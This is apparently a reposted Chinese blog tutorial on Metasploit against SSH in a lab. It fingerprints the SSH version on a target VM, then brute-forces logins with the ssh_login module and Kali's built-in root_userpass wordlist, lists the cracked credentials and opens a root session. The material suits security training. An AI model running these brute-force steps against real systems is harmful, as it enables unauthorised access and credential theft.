2022-渗透测试-信息收集-Metasploit(基于SSH协议)

目录

1.查看SSH服务的版本信息

 2.对ssh进行暴力破解

1.查看SSH服务的版本信息

打开kali系统的Metasploit软件。

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第1张图片

search version

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第2张图片

 2.use auxiliary/scanner/ssh/ssh_version

3.show options

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第3张图片 4.set RHOSTS 192.168.0.112  设置目标主机-靶机

5.run

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第4张图片

 版本是:SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 

 2.对ssh进行暴力破解

1.search ssh_login

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第5张图片

 2.使用模块use auxiliary/scanner/ssh/ssh_login

 3.查看需要配置的参数show options

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第6张图片

4.设置目标主机 set RHOSTS 192.168.0.112

5.设置字典

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

 这个字典是kali自带的,后面我们可以自己下载一个更强大的字典导入到kali里面。

 6.将破解的详细信息打印出来 set VERBOSE true

 7.run

 8.creds 列出所有数据库中的凭据,也就是账号和密码

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第7张图片

 9.sessions 查看会话

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第8张图片

 10. 进入会话 sessions -i 1

此时,我们是以root用户进来的。

2022-渗透测试-信息收集-Metasploit(基于SSH协议)_第9张图片

你可能感兴趣的:(渗透测试,网络安全,kali,linux,ssh,运维,渗透测试,kali,linux,安全)